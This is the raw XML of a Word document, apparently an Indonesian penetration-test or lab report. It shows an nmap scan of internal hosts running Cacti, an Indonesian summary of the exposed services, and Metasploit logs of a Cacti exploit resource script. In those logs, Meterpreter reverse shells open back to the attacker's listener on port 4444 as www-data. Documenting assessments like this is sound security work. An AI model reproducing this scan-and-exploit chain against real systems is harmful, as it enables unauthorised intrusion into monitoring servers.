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28 June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12</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Fri Jun 28 09:33:38 2024 as: nmap -sV -sC -Pn --script http-title -iL targets.txt -oN nmap_results.txt</w:t>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.225</w:t>
        <w:br/>
        <w:t>Host is up (0.00068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Nmap scan report for 10.33.102.226</w:t>
        <w:br/>
        <w:t>Host is up (0.00073s latency).</w:t>
        <w:br/>
        <w:t>Not shown: 998 closed ports</w:t>
        <w:br/>
        <w:t>PORT   STATE SERVICE VERSION</w:t>
        <w:br/>
        <w:t>22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)</w:t>
        <w:br/>
        <w:t>80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))</w:t>
        <w:br/>
        <w:t>|_http-server-header: Apache/2.4.52 (Ubuntu)</w:t>
        <w:br/>
        <w:t>|_http-title: Login to Cacti</w:t>
        <w:br/>
        <w:t>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
        <w:br/>
        <w:br/>
        <w:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
        <w:br/>
        <w:t># Nmap done at Fri Jun 28 09:33:45 2024 -- 2 IP addresses (2 hosts up) scanned in 7.87 seconds</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br/>
        <w:br/>
        <w:t>Hasil pemindaian menunjukkan bahwa pada alamat IP 10.33.102.212:</w:t>
        <w:br/>
        <w:t>- Port 22/tcp terbuka dengan layanan SSH menggunakan OpenSSH versi 8.2p1 pada Ubuntu.</w:t>
        <w:br/>
        <w:t>- Port 80/tcp terbuka dengan layanan HTTP menggunakan Apache HTTP Server versi 2.4.54 pada Debian, judul halamannya adalah 'Login to Cacti'.</w:t>
        <w:br/>
        <w:t>- Port 8086/tcp terbuka dengan layanan HTTP untuk InfluxDB versi 1.6.4 tanpa judul halaman.</w:t>
        <w:br/>
        <w:t>- Sistem operasi yang terdeteksi adalah Linux.</w:t>
        <w:br/>
        <w:br/>
        <w:t>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12 dan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12 dan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12</w:t>
      </w:r>
    </w:p>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Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 1 opened (10.33.102.224:4444 -&gt; 10.33.102.225:48446) at 2024-06-28 09:37:23 +0700</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 2 opened (10.33.102.224:4444 -&gt; 10.33.102.225:48462) at 2024-06-28 09:37:23 +0700</w:t>
        <w:br/>
        <w:t>[+] Found exploitable local_data_id 15 for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Command Stager progress - 100.00% done (1118/1118 bytes)</w:t>
        <w:br/>
        <w:t>resource (exploit_cacti_resource.rc)&gt; sessions -i</w:t>
        <w:br/>
        <w:br/>
        <w:t>Active sessions</w:t>
        <w:br/>
        <w:t>===============</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  Id  Name  Type                  Information            Connection</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --  ----  ----                  -----------            ----------</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1         meterpreter x86/linu  www-data @ 172.24.0.3  10.33.102.224:4444 -&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">            x                                             10.33.102.225:48446</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                                         (172.24.0.3)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  2         meterpreter x86/linu  www-data @ 172.24.0.3  10.33.102.224:4444 -&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">            x                                             10.33.102.225:48462</w:t>
        <w:br/>
        <w:t xml:space="preserve">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